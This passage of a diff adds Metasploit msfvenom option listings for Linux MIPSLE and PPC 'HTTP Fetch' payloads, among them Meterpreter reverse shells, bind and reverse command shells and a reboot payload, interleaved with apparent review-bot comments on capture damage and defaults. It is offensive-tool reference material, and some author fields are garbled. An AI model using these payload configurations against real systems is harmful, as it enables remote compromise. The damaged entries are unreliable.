string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the 
payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-mipsle-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-http-mipsle-meterpreter_reverse_https.txt new file mode 100644 index 0000000..4882db7 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-mipsle-meterpreter_reverse_https.txt 
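Review bot: the `Provided by:` section of the meterpreter_reverse_http file is empty and a damaged entry, `ok@rapid7.com>`, appears after the `Evasion options` banner, so an e-mail fragment leaked into the doc while the author name was lost; regenerate the file. Two points on the content itself: `FETCH_SRVPORT 8080` and `LPORT 8080` both default to 8080 here (the https variant uses `LPORT 8443`), so the fetch web server and the reverse_http handler will try to bind the same port on the operator host unless `FetchListenerBindPort` or `LPORT` is changed; the file should state whether the two can share a listener or which option to change. Also, the `HttpUnknownRequestResponse` default is rendered across three lines with only `It works!` surviving, which indicates the value contains markup the diff viewer interpreted; confirm the committed file holds the literal value and not rendered text.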
@@ -0,0 +1,106 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/mipsle/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + B +Evasion options for payload/cmd/linux/http/mipsle/meterpreter_reverse_https: +========================= + +@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME oKPKrTwiNTi no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to 
use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-mipsle-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-mipsle-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..a2fc6b2 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-mipsle-meterpreter_reverse_tcp.txt 
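Review bot: `Provided by:` in the meterpreter_reverse_https file is reduced to a lone `B` plus a stray `@rapid7.com>` after the `Evasion options` banner, the same capture damage as the http variant; regenerate it. Two caveats the doc should carry for this variant: `StagerVerifySSLCert false` means Meterpreter does not verify the handler certificate by default, and the first hop, fetching the MIPSLE binary with `FETCH_COMMAND CURL` from `FETCH_SRVPORT 8080`, is plain HTTP regardless of the https C2 transport, so the dropped binary has no integrity protection on the wire. `SSLVersion` also still accepts `SSL3`, `TLS1` and `TLS1.1`; a one-line warning against selecting those would be appropriate.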
@@ -0,0 +1,97 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/mipsle/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Adam Cammack + Brent Cook + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME cUPPonWYqDQ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. 
+ AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + 
PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-mipsle-reboot.txt b/msfvenom/payload_options/cmd-linux-http-mipsle-reboot.txt new file mode 100644 index 0000000..e154ba7 --- /dev/null 
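Review bot: this meterpreter_reverse_tcp file is the only one of the four Meterpreter dumps with an intact `Provided by:` list (Brendan Watters, Spencer McIntyre, Adam Cammack, Brent Cook, timwr) and no banner interleaving, so use it as the reference when regenerating the other three. One inconsistency worth a sentence in the docs: `FETCH_SRVHOST` is `Required: no` here and in every variant that has `LHOST`, but `Required: yes` in the reboot and shell_bind_tcp files, which have no `LHOST`; the pattern indicates the fetch server address falls back to `LHOST` when unset, and saying so explicitly would save readers a failed generation. The `FETCH_FILELESS` description also has an unbalanced parenthesis, `(for Python variant also Python ≥3.8 (Accepted: ...)`, inherited from upstream; better reported there than patched in these dumps.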
+++ b/msfvenom/payload_options/cmd-linux-http-mipsle-reboot.txt 
@@ -0,0 +1,68 @@ + + Name: HTTP Fetch, Linux Reboot + Module: payload/cmd/linux/http/mipsle/reboot + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Michael Messner + rigan - + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME HqyjVOMSY no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from an HTTP server. + + A very small shellcode for rebooting the system. + This payload is sometimes helpful for testing purposes. 
+ + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-mipsle-shell-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-mipsle-shell-reverse_tcp.txt new file mode 100644 index 0000000..1f38a47 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-mipsle-shell-reverse_tcp.txt 
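Review bot: `Needs Admin: No` on the reboot file is misleading next to `A very small shellcode for rebooting the system`: on Linux the reboot syscall requires CAP_SYS_BOOT, so the fetched binary will run but the reboot will fail for an unprivileged user; add a line saying the payload only does anything useful as root. Also `rigan -` in `Provided by:` has a trailing dash where an address was presumably stripped (the shell_reverse_tcp file lists `rigan` without it); clean up the author line. Note that, unlike the reverse-connect variants, `FETCH_SRVHOST` is `Required: yes` here because there is no `LHOST` to fall back on, which the description should mention.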
@@ -0,0 +1,91 @@ + + Name: HTTP Fetch, Linux Command Shell, Reverse TCP Stager + Module: payload/cmd/linux/http/mipsle/shell/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 102 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + juan vazquez + tkmru + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME fHMIGJaY no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from an HTTP server. + Spawn a command shell (staged). + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy 
false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-mipsle-shell_bind_tcp.txt b/msfvenom/payload_options/cmd-linux-http-mipsle-shell_bind_tcp.txt new file mode 100644 index 0000000..63a6df9 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-mipsle-shell_bind_tcp.txt 
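Review bot: the description block of the staged shell file stitches the component descriptions together with an unexplained blank line between `Spawn a command shell (staged).` and `Connect back to the attacker`; fine if that is verbatim msfvenom output, but check it is not capture damage. A caveat worth adding for this variant: with `EnableStageEncoding false` and a reverse TCP transport the second stage travels in cleartext over the same path the binary was fetched on, and `FETCH_DELETE false` leaves the dropped binary in `FETCH_WRITABLE_DIR ./`, i.e. whatever the target shell's working directory happens to be, until the operator removes it.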
@@ -0,0 +1,74 @@ + + Name: HTTP Fetch, Linux Command Shell, Bind TCP Inline + Module: payload/cmd/linux/http/mipsle/shell_bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + scut + vaicebine + Vlatko Kosturjak + juan vazquez + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME buADmLwtKq no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from an HTTP server. + Listen for a connection and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-mipsle-shell_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-mipsle-shell_reverse_tcp.txt new file mode 100644 index 0000000..8c1623f --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-mipsle-shell_reverse_tcp.txt 
@@ -0,0 +1,79 @@ + + Name: HTTP Fetch, Linux Command Shell, Reverse TCP Inline + Module: payload/cmd/linux/http/mipsle/shell_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + rigan + juan vazquez + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME iVIVTZUyras no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from an HTTP server. + Connect back to attacker and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-ppc-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-http-ppc-meterpreter_reverse_http.txt new file mode 100644 index 0000000..feb8f7b --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-ppc-meterpreter_reverse_http.txt 
@@ -0,0 +1,104 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/ppc/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/http/ppc/meterpreter_reverse_http: +========================= + +ent_cook@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME wlvJAncdY no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an PPC payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

